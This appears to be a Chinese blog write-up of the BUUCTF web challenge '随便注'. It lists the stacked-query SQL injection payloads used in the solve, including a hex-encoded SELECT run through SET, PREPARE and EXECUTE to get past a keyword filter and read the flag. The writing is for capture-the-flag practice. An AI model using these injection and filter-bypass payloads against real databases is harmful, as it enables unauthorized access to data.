buuctf刷题之旅—web—随便注

时间：2020-02-23 19:15:15 阅读：67 评论：0 收藏：0 [点我收藏+]

打开环境

技术分享图片

根据提示应该是sql注入

技术分享图片

查看数据库名,和数据表

1‘;show databases;#

技术分享图片

1‘;show tables;#

技术分享图片

查看表内字段（1‘;desc `1919810931114514`;#）

技术分享图片

发现关键字flag，进行查询

经过注入发现存在过滤

技术分享图片

在注入过程中发现如下代码

技术分享图片

于是利用set与prepare组合，利用16进制绕过select绕过验证

16进制(select * from 1919810931114514`),

技术分享图片

构造payload如下

1‘;SeT@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

技术分享图片

成功拿到flag

原文：https://www.cnblogs.com/anweilx/p/12353174.html

踩

(0)

评论一句话评论（0）

分享档案

更多>